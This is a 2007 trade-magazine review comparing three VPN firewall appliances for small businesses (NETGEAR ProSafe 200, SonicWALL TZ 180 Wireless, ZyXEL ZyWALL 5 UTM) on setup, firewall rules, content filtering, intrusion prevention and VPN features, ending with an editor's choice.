VPN Firewalls for SMBs

These 3 network security appliances provide serious protection for small businesses

John Green

September 26, 2007

21 Min Read
ITPro Today logo in a gray background | ITPro Today

Executive Summary:

John Green tests and compares three VPN firewall appliances for small-to-midsized businesses. NETGEAR's ProSafe VPN Firewall 200, SonicWALL's TZ 180 Wireless, and ZyXEL's ZYWALL 5 UTM all offer simplified implementation and Web-based management..

You know the dangers an online presence poses to your business: Theft of customer information is both a liability and a competitive problem, and applications that become unavailable disrupt vital revenue streams. If your small-to-midsized business (SMB) uses the Internet—and what business doesn't these days?—it needs a firewall. I set out to test firewall appliances suitable for SMBs. Appliances offer SMBs the benefits of simplified implementation and Web-based management.

As part of my selection criteria, I looked for products by companies that offer ICSA-certified firewall products. ICSA sets the standard for information security products, certifying most of the firewalls, VPNs, and antispyware and antivirus applications deployed today. For this review, I tested the ProSafe VPN Firewall 200 from NETGEAR, the TZ 180 Wireless from SonicWALL, and the ZyWALL 5 UTM from ZyXEL Communications.

All three companies offer products that are ICSA certified, though not all the products I tested are themselves certified. NETGEAR's ProSafe VPN Firewall 50 (FVS338) and ProSafe VPN Firewall 100 (FVL328) are ICSA certified; the ProSafe VPN Firewall 200 is not. SonicWALL's TZ 170 series VPN firewall appliances have received ICSA certification, and the company is pursuing certification of the TZ 180. The ZyXEL ZYWALL 5 UTM is ICSA certified.

After I chose the products to review, I realized that all of them also include VPN functionality, so I also looked at their VPN capabilities as I tested.

Both the TZ 180 and the ZyWALL 5 are Unified Threat Management (UTM) appliances that offer application-layer monitoring (sometimes called deep packet inspection) features. NETGEAR's ProSafe 200 is a basic VPN firewall appliance at a lower price. All the appliances offer VPN support and firewall features that have been available for some time, including stateful packet inspection that can detect Denial of Service (DoS) attacks.

Although designed for networking novices, these are advanced firewall products, and some networking expertise is required to use them to their best advantage. I recommend that a knowledgeable network administrator install the appliance and establish a restrictive intrusion prevention configuration, then do follow-up log monitoring to be sure you're getting the results you want and adjust the configuration if it's too restrictive. This approach is preferable to starting with a more open configuration, which promotes a potentially false sense of security.

ProSafe VPN Firewall 200
The ProSafe 200 is in a different class from the other products I reviewed, in that it lacks UTM features. Physical connectivity includes dual 10/100 Ethernet WAN ports, eight 10/100 Ethernet LAN ports, one Gigabit Ethernet LAN port, and a serial port for console access. The ProSafe supports 200 VPN connections with a Triple DES (3DES) throughput rate specification of 60Mbps and comes with a five-user license for NETGEAR’s ProSafe VPN client.

Installation and initial configuration of the ProSafe 200 was typical—I plugged in my ISP connection and a computer configured for DHCP, powered up the appliance, connected to the default address, and began configuration. Basic configuration of LAN and WAN ports was routine. I like to use PDF documentation, but the CD-ROM that accompanied the router didn’t have a copy of the ProSafe 200 manual. I downloaded the manual from NETGEAR's Web site, and it helped a lot.

Network Address Translation (NAT) is typically enabled on the ProSafe for LAN traffic, but you can turn it off and operate in a standard routing mode. By default, the ProSafe has only two rules: Allow all traffic from the LAN to the WAN, and allow WAN-to-LAN traffic only for LAN–initiated sessions. Configuring additional rules isn’t difficult. Three tabs support rules for LAN-to-WAN, LAN-to-demilitarized zone (DMZ), and DMZ-to-WAN traffic. In each case, you can configure Inbound and Outbound rules, as Figure 1 shows. To me, the “inbound” and “outbound” terminology was a bit confusing compared with the “to” and “from” structure used elsewhere. The ProSafe 200 defines several TCP and UDP services and lets you add custom service definitions. However, it doesn’t display the full configuration of predefined services—the protocol and port number, for example, aren't visible. Although the procedure for configuring the firewall was certainly workable, I consider others easier to configure.

Because the ProSafe doesn’t have special support for wireless access, I reconfigured my wireless router to connect to the appliance's LAN port, and that configuration worked. The dual WAN ports can be set up for either a failover configuration or a load-balancing configuration. In both cases, the two LAN ports always have their own IP addresses. When failover occurs, existing VPN connections collapse and must be reestablished by the originating user or device on the other IP address. You implement a load-balancing configuration by arranging to have some users connect to the first port while others connect to the second port, or by dedicating one port to inbound traffic and the other to outbound traffic.

The ProSafe 200 supports content filtering by keyword, which you implement by specifying a list of keywords to scan for. Content filtering causes the appliance to block the display of Web pages that contain any of the specified keywords. You can assign network hosts to one of eight groups, either by fixed IP address or by DHCP reservation, then enable keyword blocking for one or more of the groups. The ProSafe discovers systems on the local network segment to ease initial configuration. In my testing, results were inconsistent—I configured keywords that I knew existed at a specific URL, but sometimes the ProSafe 200 still allowed the Web page to be displayed.

NETGEAR's product offers both network-to-network and client-to-network VPN tunnels, which you configure by using the Web administrative interface. The supported standards and protocols include both main and aggressive Internet Key Exchange (IKE) negotiation; Advanced Encryption Standard (AES) with 128-bit, 192-bit, and 256-bit key lengths, as well as DES and 3DES; Secure Hash Algorithm-1 (SHA-1) and MD5 authentication; and extended (user) authentication using both locally-defined users and Remote Authentication Dial-In User Service (RADIUS). The appliance uses the Diffie-Hellman key exchange protocol, with support for groups 1, 2, and 5 (768-, 1,024-, and 1,536-bit encryption keys, respectively).

You can define Mode Config Records, which are used to specify pools of IP addresses to assign to client VPN endpoints. Mode Config Records operate similarly to the way DHCP assigns addresses to network clients, but the ProSafe doesn’t support standard DHCP address assignment. Figure 2 shows the IKE policy configuration page. The ProSafe doesn’t support automatically reinstated (aka "nailed-up") connections, requiring instead that you cause traffic to use the connection at regular intervals to avoid a timeout. Certificate support includes use of imported and self-generated certificates.

The ProSafe 200's VPN wizard simplifies configuring VPN connections. The wizard assumes use of a preshared key rather than certificates, which eases setup. After creating a policy with the wizard, you can customize the policy using the standard VPN configuration pages. VPN activities are logged on the VPN Logs page of the Web interface.

The router ships with five licenses for VPN client software, which includes a full-featured certificate manager and is well documented in a 212-page reference manual. Dual WAN interfaces let you configure both client and network-to-network connections with a backup path for the VPN tunnel.

Some of the ProSafe's features left me wanting. Its configuration is a little less friendly than the other products', and the keyword-based content filtering isn’t anything to write home about. Although I find it hard to give this unit a strong recommendation in comparison to the other products I reviewed, its dual WAN connectivity and support for 200 VPN endpoints at a price comparable to the non-UTM version of the ZyWALL 5 might make heavy VPN users want to consider it.

TZ 180 Wireless
The TZ 180 Wireless is the midrange product in SonicWALL’s TZ product line. Although it’s physically the smallest of the three products I review here, it packs a lot into its small package. Physical connections include five LAN ports and a WAN port. Console ports and optional ports are also present, but you must purchase SonicOS Enhanced to enable them.

The TZ 180 performs application-layer inspection of incoming data streams; provides antivirus, antispyware, and intrusion detection; and boasts a deep-packet-inspection throughput rate of 10Mbps. Its VPN features support both client and gateway operation with throughput rates of 30Mbps. The wireless LAN provides 802.11b/g operation and supports a full complement of current security standards, including the network access control standard 802.1x. SonicWALL also offers a version of the TZ 180 without wireless LAN support.

You can choose from two licenses for the TZ 180: one to protect up to 10 network nodes and another for up to 25 network nodes. The 10-node license includes support for two site-to-site VPN connections and five client-computer VPN connections; you must purchase SonicWALL's VPN client software separately. The TZ 180 also works with other standard VPN clients. The 25-node license allows 10 site-to-site VPN connections and 25 client-computer VPN connections and includes one VPN client software license. The appliance I reviewed ran SonicOS Standard 3.8; SonicWALL also offers SonicOS Enhanced, which has additional capabilities.

To install the TZ 180, I connected a computer to the appliance, and the TZ 180’s DHCP server provided the computer with an IP address, letting me connect to the appliance's browser-based management interface. A setup wizard guided me through basic configuration of the WAN, LAN, and wireless interfaces. I found configuring the wireless interface as easy as any wireless router I’ve used, and its integration with the other security features really eased overall administrative effort.

To unlock the advanced security features, I had to register the appliance with SonicWALL. You can do this directly from the administrative interface or manually from the SonicWALL Web site. First, I had to request a user ID on the vendor's Web site. The confirming email presented me with a registration link, which I used to register the appliance. However, the TZ 180 still considered itself unregistered. It turns out I needed to copy a keyset character string from the Web site into the TZ 180 administrative interface, which wasn’t clearly documented in the Getting Started Guide.

I still had problems enabling the antivirus, antispyware, and intrusion detection capabilities because the TZ 180 reported that the required signature files weren’t downloading. SonicWALL's technical support quickly corrected the problem.

The TZ 180 installs with a set of access rules that give LAN hosts full access to all networks and restrict traffic originating on WAN and wireless LAN ports. Using the Web interface, you can easily create new access rules for a specific address or a range of addresses. Common TCP and UDP services are predefined, and you can add others. You can store access rules by leaving them in a disabled state, for occasional implementation. For example, if you occasionally want to manage the unit from a WAN address, you can create a rule that allows HTTPS management via the WAN interface, then activate the rule only when you need to.You can also configure access rules to be active only during a specified time of day and day of the week and to enforce minimum and maximum bandwidth utilization limits.

The appliance I tested doesn’t support the concept of a DMZ. With the upgrade to SonicOS Enhanced, the OPT (optional) port becomes another network interface on a par with the LAN, WAN, and wireless LAN (WLAN) interfaces and can be configured as a DMZ.

SonicWALL bundles antivirus, antispam, and intrusion prevention subscriptions in a single subscription product that's included with the TZ 180. SonicWALL develops detection signatures both internally and with the assistance of third-party sources. I counted 43 categories of intrusion prevention signatures, each category containing many attack signatures. For ease of implementation, the TZ 180 classifies each signature as low, medium, or high priority and lets you configure each priority for simple detection, prevention, or both. To fine-tune the protection, you can configure individual signatures and specify whether detection and prevention events of each signature should be logged.

The helpful logging screen, which Figure 3 shows, displays prevention responses in yellow. Clicking a prevention response displays the configuration screen for the signature, letting you quickly reconfigure the response in the log if you wish. I configured prevention for all three priorities and quickly discovered that some applications stopped working. By reconfiguring to detect but not prevent the signature that caused an application to stop working, I was able to maintain security and restore the applications to operation.

SonicWALL offers two levels of content filtering: Standard and Premium. The Standard option supports 12 content categories. I tested the Premium version, which supports 56 categories of content and lets you configure varying access levels for different users and groups. Selecting all the categories seemed to block access to all Web sites except SonicWALL's. Reconfiguring, I blocked only those topics that we hear make poor party conversation: government and religion. The TZ 180 duly prohibited my access to church and government sites.

You can view the event logs through the administrative interface and manually export them to a file. You can also configure the appliance to send log records to a syslog server and to periodically send collected log records to an email address.

VPN support includes a full complement of VPN-related standards and features: AES encryption at 128,192, and 256 bits as well as DES and 3DES encryption; MD5 and SHA-1 authentication; manual and certificate-based key exchange (using imported or locally generated certificates); Diffie-Hellman key exchange with support for groups 1, 2 and 5; extended user authentication using RADIUS and local user accounts; and the ability to pass NetBIOS traffic. SonicWALL offers its own Global Security Client, but the appliance's VPN features will work with most standards-based VPN clients.

The TZ 180's advanced options include bandwidth management for VPN traffic, routing and forwarding of VPN traffic, and the ability to apply NAT and firewall rules to a VPN tunnel. Remote clients have the option of obtaining their IP addresses via local DHCP. You can also configure IP network services and remote network addresses to bypass user security association (SA) authentication, as Figure 4 shows.

A VPN policy wizard simplifies policy creation and offers a Typical mode with few options exposed and a Custom mode that lets you configure additional protocol options. After you create a policy, you can set all options using the standard Web administration screens. The TZ 180 arrives with a predefined GroupVPN policy, used with L2TP client connections. Although you can modify the GroupVPN policy, you can't delete it. You can have a maximum of three defined policies, including the GroupVPN policy. Considering that you can create VPN policies in Disabled mode, the three-policy limit seemed unnecessarily restrictive.

ZyWALL 5 UTM
The ZyWALL is the entry-level model of three appliances in ZyXEL’s UTM VPN firewall product line. It has one WAN port and four 10/100 Ethernet ports individually configurable for LAN, DMZ, or WLAN connectivity. Serial ports provide dial-up backup WAN connectivity and a console connection. The ZyWALL dedicates the processor on the ZyWALL Turbo Card, a PC Card that installs into the appliance's single expansion slot, to application-layer scanning for intrusion and virus detection.

The ZyWALL applies intrusion prevention technology developed inhouse and implements Kaspersky Lab antivirus technology, the Mailshell antispam engine, and content filtering from Blue Coat Systems. Both the firewall and VPN features are ICSA certified. ZyXEL publishes basic firewall throughput rates of 65Mbps; VPN 3DES/AES throughput rate is 25Mbps with up to 10 simultaneous IPsec VPN connections. The throughput rate for UTM features, which use a streaming rather than store-and-forward implementation, is 12Mbps.

Installation proceeded easily. I inserted the Turbo Card, plugged in the connection cables for my Internet connection and the computer I would use for initial configuration, and powered up the appliance. The appliance's built-in DHCP server supplied an IP address to the computer, and I used Microsoft Internet Explorer to connect to the ZyWALL's Web interface. The WAN interface received its configuration from my ISP. I configured two of the four LAN ports for simple LAN use, one port for DMZ attachment, and one port for WLAN use. For a few frustrating moments my wireless notebook couldn’t access my LAN-based server, then I realized that the WLAN is configured by default to access only WAN destinations.

The ZyWALL's basic firewall configuration is easy. A From/To matrix, which Figure 5 shows, lets you configure, for example, traffic originating on the WLAN and addressed to a WLAN, WAN, LAN, DMZ, or VPN destination to be permitted, blocked, or dropped. A check box for each combination let me specify whether logging will occur for the rule. The Service tab let me define custom TCP/UDP service ports to augment the predefined set, and a Rule Summary tab let me create custom firewall rules. Rule options allow the ZyWALL to drop, permit, or reject matching packets; other options let you enable logging and alerts. Day-of-week check boxes and a time-of-day range let you specify when the rule is active. Unlike the TZ 180, which automatically ordered custom firewall rules, the ZyWALL has you manually order them within each source/destination pair. In most cases this is just extra work, but I suspect the ability to manually order the rules would be useful in some situations.

Antivirus, antispam, intrusion detection and prevention, and content-filtering subscriptions are available separately, and you need to subscribe to continuing signature-file updates to maintain protection against new viruses and styles of network attacks. To help you manage the processing load that application-layer scanning places on the system, you can selectively enable antivirus, antispam, and intrusion detection and prevention by selecting check boxes on an interface that has a To/From matrix, similar to the way you enable traffic between interfaces on the firewall. Antivirus configuration gives you a bit more granularity, letting you selectively enable scanning between every pair of interfaces for each of four network services: HTTP, FTP, POP3, and SMTP.

For intrusion detection and prevention, I counted 12 classes of attack signatures, each class being a container for many individual signatures. Every signature is configurable—you can drop the packet when the signature is found or drop the balance of the TCP session (both silently), or you can drop the session, sending TCP Reset packets to the source and/or destination IP addresses. Other options let you deactivate a signature so the ZyWALL doesn’t scan for it or send an email alert when the signature is found. You can configure the appliance to automatically update intrusion-detection and -prevention signatures, which also updates antivirus signatures.

I enabled content filtering and found it easy to customize. The ZyWALL doesn’t support different content-filtering rules for different classes of users, which is more of an enterprise feature. However, you can specify a list of IP addresses to be excluded from or included in content filtering.

When content filtering is enabled, the ZyWALL forwards a user's first reference to a Web site in a query to the Blue Coat Systems database and waits up to 10 seconds for the result of the query before displaying the requested page. In my tests against widely used media Web sites, there was no noticeable delay before either the Web page or a “Blocked” message was displayed. The database results are held in local cache until the ZyWALL restarts or the record ages out—by default, after 72 hours. If the Web site is in a blocked category, it's blocked, blocked and logged, or simply logged, depending on the configuration. You can also configure your own lists of allowed and prohibited Web sites and can block sites containing specific keywords. In my tests, content filtering was effective, blocking URL–based email content as well as browser-based displays.

Although there's a lot of granularity in your ability to configure what's logged and when an event will generate an alert, the ZyWALL's logging and notification facilities are otherwise pretty basic. You can specify an email address to receive accumulated log records, another email address to receive alerts, and a syslog server to receive all records. For intrusion detection and prevention events, the ZyWALL's log display includes a link to more information.

The ZyWALL's VPN feature set supports both manual key exchange and IKE using preshared keys or certificates; DES, 3DES, and AES encryption standards; SHA-1 and MD5 authentication; IPsec NAT traversal; and user authentication using a RADIUS server or users defined internally to the ZyWALL. VPN 3DES and AES throughput rate is 25Mbps with up to 10 simultaneous IPsec VPN connections. The ZyWALL supports both gateway (remote network to local network) and client (computer to local network) tunnels. The ZyWALL also supports a high-availability configuration, in which you configure a remote router for a gateway connection in the event that the primary router fails.

You define and configure VPN endpoints using the ZyWALL's Web interface. VPN rules, which Figure 6 shows, define both the security parameters used to establish a secure connection and which networks and devices on both ends of the link can use the tunnel. During key exchange, the ZyWALL supports both main mode and the faster, slightly less secure aggressive mode. The ZyWALL uses Diffie-Hellman key exchange and supports both group 1 and group 2 encryption keys. It supports nailed-up connections and gives you the option to pass NetBIOS broadcast traffic, allowing NetBIOS-based network discovery. Another set of screens lets you import and export certificates used for authentication at both ends of the tunnel, including self-signed certificates that the ZyWALL can generate upon request. Because the VPN engine is ICSA certified, it works with any ICSA-certified VPN client. The ZyWALL itself doesn't include any VPN client software licenses.

Editor's Choice

The Editor’s (Difficult) Choice
I found it difficult to award an Editor's Choice for this review. Both the TZ 180 and the ZyWALL appliances were strong performers, and I believe both would work well for SMBs.

If ease of use and administration is a big concern, I suggest the TZ 180. Its integrated wireless access point is a real bonus for businesses that have limited inhouse technical expertise.

My personal choice, however, is the ZyWALL. I really like the configuration flexibility it offers, even though configuration was a bit more work. Its check box approach to configuring many aspects of scanning is easy to use and affords a high degree of granularity in setup. I also like the use of third-party scanning engines (“best of breed” is ZyXEL's take on it), as I have more confidence in products that are part of a company's key mission rather than a supporting activity. The ZyWALL's dedication of the Turbo Card's processor to application-layer scanning is also appealing. The major weakness I see is that its lack of integrated wireless LAN support leaves traffic between wireless devices unscanned. However, the positive qualities outweigh that weakness, and ZyWALL is my Editor's Choice.

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like